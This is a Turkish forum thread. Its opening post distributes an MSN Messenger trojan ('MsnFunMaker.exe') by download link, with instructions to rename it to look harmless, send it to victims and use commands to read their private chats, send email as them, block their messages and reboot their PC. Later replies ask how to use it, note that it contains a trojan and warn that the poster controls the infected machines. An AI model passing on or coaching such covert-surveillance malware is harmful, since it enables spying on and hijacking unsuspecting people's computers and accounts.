Msndekilerin Kiminle Ne Konustugunu Ogrenin

gonenc

New member
Reaction score
0
Arkadaşlar Ekteki "exe" Dosyasini kesinlikle Kendi Bilgisayinizda Çaliştirmayiniz

Evet arkadaşlar işte süper bir program..ilk önce programın neler yaptiğindan bahsedicem..
Ekte olan exe dosyasini karşi tarafa yolluyorsunuz..eğer karşimizdaki kişi programi alip bilgisayarinda çaliştirirsa bir dll hatasi aliyor ve msn'i kapaniyor..
yani programi kişiye yolladiniğizda açip açmadiğini buradan öğrebiliriz..
Programi , kişiye yolladik , kişi exe dosyasini açti ve msn'den düştü..
tekrar msn'e geldi ve işte eğlenceli olan bölüm başliyor..
Kişinin kimler ile yazıştiğini görebiliyorsunuz..
Neler konoştuğunu görebiliyorsunuz..
Nick'ini Değiştirebiliyorsunuz..
cd-rom kapağini açtirabiliyorsunuz..
Bilgisayarina restart attirabiliyorsunuz..
istediğiniz web sayfasina girmesini sağlayabiliyorsunuz..
bilgisayarinda küçük bir pencere'de istediğiniz msj'ı yayınlayabiliyorsunuz..
ve bir kaç özellik daha.. Mitnick?
şimdi komutlara gelelim ;
_spy : bunu exe dosyasini açan kişiye yazdiğinizda kimler ile ne konuşuyor göreceksiniz..
name(yazacağiniz nick) : kişinin msn'de ki nickini değiştirmeye yarayan komut..örnek ; name'den sonra parantez işinde olan yazı nick'i olur..
msg(yazacağiniz msj) : kişinin bilgisayarinda küçük bir pencerede msg yazisindan sonra parantez içinde yazacağiniz msj çıkar..
www(www.siteadresi.com) : bu komut ile kişiyi istediğiniz web sayfasina sokabilirsiniz..www dan sonra parantez içine site adresini yazmaniz yeterli olacaktir..
_nosend : exe dosyasini açan kişinin yazdıklari sizden başka kimseye gitmez bu komutu yazdiğiniz taktirde..
_dosend : _nosend komutunu kapatir..
_message+email+(msj) : kişinin mail adresinden o sirada konuştuğu birine mail atmanizi sağliyor..zaten _spy komutu ile hangi mail adresi ile ne konuştuğu gözüküyor..komutun kullanimi ise ; [email protected]+(kajsdkajsd) bu şekilde.. Mitnick?
_noreceive : bu komutu yazdiğinizda ise kişi kimseden ileti alamaz..
_doreceive : _noreceive komutunu kapatir..
_logout : kişiyi msn'de çevrimdışı yapar..
_cdopen : kişinin cd-rom unu açar..
_restart : kişinin bilgisayarina reset atar..
Mitnick?
Arkadaşlar bu dosyayi açan kişi sizi kesinlikle blocklayamaz..
ve komutlari yazdiğinizda kesinlikle karşi taraf bu komutlari görmez , göremez..
MsnFunMaker.exe dosyasinin ismini değiştirebilrisiniz..
games.exe vs. gibi fakat kesinlikle formatini değiştirmeyin..
ve kesinlikle dosyayi kendi bilgisayarinizda açmayin kesinlikle..
bu dosya gönderdiğiniz kişi'den kendini 1 ay içinde kaldiriyor.. [ALİNTİDİR]:cool:

http://www.hemenpaylas.com/download/496905/MsnFunMaker2_1__1_.02.zip.html
not: ben yapamdım yapan olursa banda solesin ama kesin işe yarıomus

kardeş emeğin için sağolda daha önce verildi forumda

saol kardes guzel bır olay ama daha denemek nasıp olmadı hade bakalım ne olcak :D

babacım bende uygulayamdım onceden verilmiş forumdada bi yapan anlatsin kolayca ya

bunlar eskidi benceama halen msn kulanmasını bilmeyenc ok insna var oldunu tahmin edebiliyorum tabiki şefkinmiz kırma deği ama cin iyi kurban bulmak zorlaştını düşünüyorum

güzel bişi gibi ben daha önce görmemiştim saol

ya annladık verilmişte nasıl kullanılıyor bu mesela karsı tarafa yolladım actı calıstırdı dustu msn den sonra nasıL ogrenicem nereye ne komutu yazacam nereye bakıcam bir kısaca acıklasanız olmaz mı ya?

ßu konu burda sevencloves tarafından verildiğinde 2005 in basıydı be

choosy dogruda nasıL yapılıyor bir acıklasanız mesela komut mu yazıcaz nereye yazıcaz orada komutlar verilmiş nereye yazıcam onları ileti penceresine mi?

kardes ıcınde turuva atı cıktı bunun yaw neden acep ?

önceden kullanmıştım ii programdır ama herzaman işe yaramıyor

Tamm Verilmis Oncdden Yeni Uyeler Için Bi Daha Verdik Teskur Edin Arkdaslar Biralim Yorumu Valla Birakacam Bu Bolumu Aldult Ta Gecicem Ben Orda Daha Cok Taktir Goruosun

kardeş bu nasıl oluyor anlamadın exe yi yani server ı:durdurun karşıya attım diyelim olmazda hadi yaptım adam açtı ben o na HANGİ PROGRAMDAN BAĞLANACAM söylermisin hack pardon lamer kardeşim
ona bağlanabilmem için bendede bi programın olması gerekmezmi
yoksa bizden kendi serverını yaymamız içinmi yardım istiyorsun?
yani bu anlık ileti akıllı bir şey değilki:durdurun benim yolladığımı bilsin olayı benim pc me veya ip me yönlendirsin
yemezler usta be:goz:
daha açık konuşuyum yazdığımı anlamayanlar hala olabilir bu adamın kendi server ı maili yolladığınıza siz değil o egemen olacak saf arkadaşlara uyarı

aynen cgdsbll kardeş adam kendi serwer ını oluşturmuş bize karşı değilde bizim yolladığımız kişilere yönelik! çünkü bizim komut yazabilmemiz için bizde de bi bağlanma programı olmalı!kimse saf değil kardeşim kendi kuyumuzu kazmaktan vazgeçelim artık lütfen!

Geri